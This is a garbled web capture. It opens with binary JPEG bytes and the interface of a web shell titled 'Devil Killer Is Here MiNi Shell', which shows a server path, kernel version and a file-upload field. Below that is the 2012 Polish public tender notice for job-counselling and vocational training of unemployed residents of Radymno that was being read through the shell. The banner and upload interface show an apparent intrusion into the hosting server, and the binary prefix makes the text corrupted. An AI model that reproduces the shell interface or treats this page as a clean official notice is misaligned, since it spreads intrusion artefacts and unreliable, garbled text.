JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/189882-N-2012.html

<p class="kh_header"><b>Radymno: Doradztwo zawodowe i trening kompetencji i umiejętności społecznych oraz usługi szkoleniowe dla osób bezrobotnych lub nieaktywnych zawodowo będących w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej,  zam. na terenie Gm. Radymno zagrożonych wykluczeniem społecznym  w ramach proj. Czas na aktywność w Gm. Radymno realizowanego w ramach POKL Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1  Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 189882 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radymno , ul. Lwowska 38, 37-550 Radymno, woj. podkarpackie, tel. 016 6282419, 628138, 6281367, faks 016 6282419.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doradztwo zawodowe i trening kompetencji i umiejętności społecznych oraz usługi szkoleniowe dla osób bezrobotnych lub nieaktywnych zawodowo będących w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej,  zam. na terenie Gm. Radymno zagrożonych wykluczeniem społecznym  w ramach proj. Czas na aktywność w Gm. Radymno realizowanego w ramach POKL Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1  Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie doradztwa zawodowego i treningu kompetencji i umiejętności społecznych oraz usługi szkoleniowe dla osób bezrobotnych lub nieaktywnych zawodowo będących w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej, zamieszkałych na terenie Gminy Radymno zagrożonych wykluczeniem społecznym  w ramach projektu Czas na aktywność w Gminie Radymno realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1  Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Szczegółowy opis przedmiotu zamówienia:
Przedmiotowe postępowanie składa się z dwóch Części, zawierających łącznie 9 Pakietów.

Część I dotyczy usług doradztwa zawodowego oraz treningu kompetencji i umiejętności społecznych i obejmuje następujące Pakiety:

Pakiet I.1. Organizacja i przeprowadzenie treningów kompetencji i umiejętności społecznych dla 15 uczestników projektu;
Pakiet I.2. Organizacja i przeprowadzanie warsztatów doradztwa zawodowego dla 15 uczestników projektu oraz sesji indywidualnych doradztwa zawodowego dla tych osób.

Miejsce prowadzenia szkolenia: miasto Radymno  lub inna miejscowość, jednak oddalona  nie dalej niż 25 km od siedziby Zamawiającego, posiadająca dobrą sieć połączeń komunikacyjnych (co najmniej PKP, PKS).  

Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1.1  do SIWZ.

Uwaga: Ofertę należy złożyć na całą Część  I  zamówienia obejmującą  Pakiety  od nr I.1 do nr I.2 . Zamawiający nie wyraża zgody na złożenie oferty na wybrane Pakiety w zakresie tej Części.  


Część II dotyczy szkoleń zawodowych i  obejmuje następujące pakiety:

Pakiet II.1. Obsługa kasy fiskalnej z fakturowaniem dla 6 osób;
Pakiet II.2. Krawiec dla 1 osoby;
Pakiet II.3. Fryzjer dla 1 osoby;
Pakiet II.4. Kucharz dla 1 osoby;
Pakiet II.5. Operator koparko-ładowarki dla 4 osób;
Pakiet II.6. Opiekunka chorego i osoby starszej dla 1 osoby;
Pakiet II.7. Drwal - operator pilarki dla 1 osoby.

Miejsce prowadzenia szkolenia: miasto Radymno  lub inna miejscowość, jednak oddalona  nie dalej niż 25 km od siedziby Zamawiającego, posiadająca dobrą sieć połączeń komunikacyjnych (co najmniej PKP, PKS).  

Uwaga: Ofertę należy złożyć na całą Część  II zamówienia obejmującą  Pakiety  od nr II.1 do nr II.7 . Zamawiający nie wyraża zgody na złożenie oferty na wybrane Pakiety w zakresie tej Części.  

Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1.2 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 85.70.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do przedmiotowego postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  dotyczący  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający uzna  za spełniony jeżeli Wykonawca:
- jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365),
- złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek  dotyczący  posiadania  wiedzy i doświadczenia Zamawiający uzna za spełniony jeżeli Wykonawca: 
-W okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 usługi szkoleniowe dla minimum 1 osoby każde, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia,
- złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek  dotyczący  dysponowania odpowiednim potencjałem technicznym Zamawiający uzna  za spełniony jeżeli Wykonawca:
- Dysponuje odpowiednimi warunkami lokalowymi i wyposażeniem dydaktycznym, a to:
	a) dysponuje pomieszczeniami wykładowymi, zapleczem sanitarnym oraz do  praktycznej nauki zawodu, których liczba i wielkość jest adekwatna do liczby Pakietów, których dotyczy złożona oferta oraz uwzględnia wielkość grup szkoleniowych danego Pakietu, jak również program szkolenia opisany w Załącznikach nr 1.1 i nr 1.2 do SIWZ - jeśli dotyczy
b) dysponuje odpowiednim sprzętem technicznym - zgodnie z załącznikiem Nr 11 do SIWZ
- złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek  dotyczący  dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający uzna  za spełniony jeżeli Wykonawca:
- złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek  dotyczący  sytuacji ekonomicznej i finansowej Zamawiający uzna za spełniony jeżeli Wykonawca przedłoży:
- oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku złożenia oferty przez Wykonawcę, który będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobami zdolnymi do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących Wykonawcę z innymi podmiotami stosunków, w celu udowodnienia zamawiającemu, iż Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia,   wraz z ofertą należy złożyć pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotowego  zamówienia. (jeśli dotyczy) 
2.Ponadto, w przypadku powołania się  Wykonawcy na wiedzę i doświadczenie innych podmiotów, w razie zaistnienia  konieczności realizacji zamówienia (lub części zamówienia) przez te podmioty (podwykonawstwo), należy dodatkowo - oprócz pisemnego zobowiązania podmiotu, któremu Wykonawca powierzył podwykonawstwo -  złożyć oświadczenia tych podmiotów o braku podstaw do wykluczenia z postępowania na podstawie  art. art. 24 ust. 1  ustawy Pzp. z wykorzystaniem wzoru - Załącznik Nr 2.2  SIWZ (jeśli dotyczy)
3. Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych wydawane przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236 poz. 2365). 
4. Ponadto, Wykonawca powinien złożyć oświadczenie mówiące o tym, że zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych wydawane przez Wojewódzki Urząd Pracy, jest aktualne w roku bieżącym, tj. 2012, co jest jednoznaczne z tym, iż Wykonawca w roku bieżącym nadal prowadzi działalność szkoleniową.
5. Wykaz zrealizowanych szkoleń dla co najmniej 1 osoby, a w przypadku świadczeń okresowych lub ciągłych również realizowanych usług szkoleniowych  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie. Wykaz powinien zawierać co najmniej 2 pozycje.  Do wykazu należy załączyć dokumenty wystawione przez Zamawiających, na rzecz których wykonane zostały usługi, potwierdzające, że zostały wykonane należycie (np. referencje, rekomendacje, listy polecające) -  Załącznik nr 6 do SIWZ .
6. Wykaz sal wykładowych (określić liczbę miejsc szkoleniowych), wyposażenia dydaktycznego (określić liczbę, rodzaj kas fiskalnych, wyposażenie kuchenne,  itp.) jakimi dysponuje Wykonawca do realizacji szkolenia - Załącznik nr  11 do SIWZ, oddzielny dla każdego Pakietu poszczególnych Części (odpowiednio Części I i Części II).  
7.W  przypadku gdy jednostka szkoląca nie posiada  własnego lokalu - sal dydaktycznych należy dołączyć do formularza  ofertowego dokument (uwierzytelnioną przez Wykonawcę kopię)  potwierdzający prawo do dysponowania  lokalem  umożliwiającym  przeprowadzenie  zajęć.
8. Wykaz osób, które będą realizować przedmiot zamówienia (tj. wykładowców, trenerów, instruktorów, doradców itp.) wraz z informacjami i dokumentami potwierdzającymi kwalifikacje i doświadczenia zawodowego oraz informacjami dotyczącymi zakresu wykonywanych przez nich czynności - według wzoru stanowiącego załącznik nr 5 do SIWZ, oddzielny dla każdego Pakietu poszczególnych Części (odpowiednio Części I i Części II).  
9.  Program szkolenia - który ma stanowić załącznik do kwestionariusza kursu stanowiącego Załącznik  nr 9 do SIWZ, oddzielny dla każdego Pakietu poszczególnych Części (odpowiednio Części I i Części II).  
Program szkolenia winien zawierać:
1) nazwę i zakres szkolenia,
2) czas trwania i sposób organizacji szkolenia,
3) cele szkolenia,
4) plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej,
5) treść szkolenia w zakresie poszczególnych zajęć edukacyjnych,
6) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
7) sposób sprawdzania efektów szkolenia, w tym precyzyjny opis, w jaki sposób Wykonawca zamierza spełnić wymóg indywidualizacji kształcenia poprzez prowadzenie stałej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób napotykających trudności w procesie nauczania.
10. Preliminarz kosztów szkolenia - zgodnie z załącznikiem nr 7 do SIWZ, oddzielny dla każdego Pakietu poszczególnych Części (odpowiednio Części I i Części II).  
11. Zbiorczy preliminarz kosztów szkolenia - zgodnie z załącznikiem nr 7 (odpowiednio 7.I, 7.II)  do SIWZ.
12. Wykaz osób, które będą realizować przedmiot zamówienia (tj. wykładowców, trenerów, instruktorów, doradców itp.) wraz z informacjami i dokumentami potwierdzającymi kwalifikacje i doświadczenia zawodowego oraz informacjami dotyczącymi zakresu wykonywanych przez nich czynności - według wzoru stanowiącego załącznik nr 5 do SIWZ, oddzielny dla każdego Pakietu poszczególnych Części (odpowiednio Części I i Części II).  
13. Certyfikaty jakości usług, jeżeli wykonawca takie posiada. Certyfikat jakości usług może dotyczyć zarówno kierunku szkolenia, na które wykonawca złoży ofertę, jak również Wykonawcy, jako instytucji szkoleniowej świadczącej usługi szkoleniowe. Będą brane pod uwagę różne formy certyfikatów, np.: Certyfikaty Systemu Zarządzania Jakością ISO, Akredytacje np. Kuratora Oświaty, Polskiego Towarzystwa Informatycznego, Polskiego Biura Europejskiego Certyfikatu Umiejętności Komputerowych, Atesty itp.
14. Kwestionariusz kursu zgodnie z załącznikiem nr 9 do SIWZ, oddzielny dla każdego Pakietu poszczególnych Części (odpowiednio Części I i Części II).  
15. Oświadczenie Wykonawcy o  woli współpracy  i dyspozycyjności  w okresie realizacji kursu  zgodnie z załącznikiem nr 4 do SIWZ.

Uwaga: Wykaz dokumentów wystawionych przez Zamawiających, na rzecz których wykonane zostały usługi, potwierdzających, że zostały one wykonane należycie  wraz z  dokumentami (np. referencjami, rekomendacjami, listami polecającymi),   wykaz osób, które będą realizować przedmiot zamówienia (Zał. nr 5 do SIWZ) wraz z informacjami i dokumentami oraz certyfikaty jakości usług są dokumentami służącymi do oceny ofert i w przypadku nie dołączenia ich wraz z ofertą  - nie będą podlegać uzupełnieniu, z zastrzeżeniem art. 26 ust 3 ustawy Pzp. (Zamawiający uzupełni dokumenty tylko w celu potwierdzenia spełnienia warunków udziału w postępowania na podst. art. 22 ust. Pzp. )</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - kwalifikacje kadry dydaktycznej - 15</li>
<li>3 - doświadczenie Wykonawcy - 10</li>
<li>4 - posiadanie przez Wykonawcę certyfikatów jakości usług - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie prawo do skierowania na doradztwo/szkolenie nowego Uczestnika, w przypadku, gdy jeden z dotychczasowych Uczestników przerwał zajęcia. 
2. Wykonawca zobowiązany jest dołożyć starań, aby nowy Uczestnik uzupełnił materiał objęty doradztwem/szkoleniem o zakres, w którym Uczestnik nie brał udziału. (jeżeli dotyczy)
3. W przypadku, gdy po przerwaniu zajęć przez Uczestnika, grupa szkoleniowa nie zostanie uzupełniona przez nowego Uczestnika, Zamawiający pokryje koszty doradztwa/szkolenia Uczestnika, który przerwał zajęcia za okres jego uczestnictwa w zajęciach, na podstawie wyliczeń przekazanych przez Wykonawcę. Wyliczenie zostanie dokonane w oparciu o rzeczywiście poniesione koszty przez Wykonawcę, tj. koszt materiałów szkoleniowych oraz koszty, które ponosi Wykonawca niezależnie od liczby uczestników szkolenia (wynagrodzenie osób przeprowadzających doradztwo/szkolenie, wynajem sal wykładowych).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops-radymno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Radymnie
ul. Lwowska 38, 37-550 Radymno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 12:00, miejsce: Siedziba Zamawiającego: Urząd Gminy Radymno - Gminny Ośrodek Pomocy Społecznej w Radymnie (sekretariat), ul. Lwowska 38, 37-550 Radymno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zamówienie ma na celu realizację projektu systemowego udzielania wsparcia dla osób bezrobotnych lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej, zamieszkałych na terenie Gminy Radymno. 
W szczególności  trening  kompetencji i umiejętności społecznych  ma na celu podniesienie poziomu samooceny, wzrostu motywacji i aspiracji zawodowych oraz wzrost umiejętności interpersonalnych uczestników projektu,  warsztaty doradztwa zawodowego mają przygotować uczestników tych warsztatów do samodzielnego sporządzenia listu motywacyjnego, CV, oraz innych przydatnych dokumentów,  niezbędnych przy poszukiwaniu pracy.  Szkolenia zawodowe  zaś mają dostarczyć uczestnikom szkoleń umiejętności praktycznych wraz z uprawnieniami do wykonywania  czynności w danym, zawodzie.
Przedsięwzięcie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Środki finansowe są przyznane w ramach projektu  Czas na aktywność w Gminie Radymno realizowanym w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1  Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I dotyczy usług doradztwa zawodowego oraz treningu kompetencji i umiejętności społecznych i obejmuje następujące Pakiety:

Pakiet I.1. Organizacja i przeprowadzenie treningów kompetencji i umiejętności społecznych dla 15 uczestników projektu;
Pakiet I.2. Organizacja i przeprowadzanie warsztatów doradztwa zawodowego dla 15 uczestników projektu oraz sesji indywidualnych doradztwa zawodowego dla tych osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening  kompetencji i umiejętności społecznych  ma na celu podniesienie poziomu samooceny, wzrostu motywacji i aspiracji zawodowych oraz wzrost umiejętności interpersonalnych uczestników projektu,  warsztaty doradztwa zawodowego mają przygotować uczestników tych warsztatów do samodzielnego sporządzenia listu motywacyjnego, CV, oraz innych przydatnych dokumentów,  niezbędnych przy poszukiwaniu pracy.  Szacunkowa wartość zamówienia, obejmująca Pakiety I.1 i I.2(bez VAT) w PLN: 5000,00-6000,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
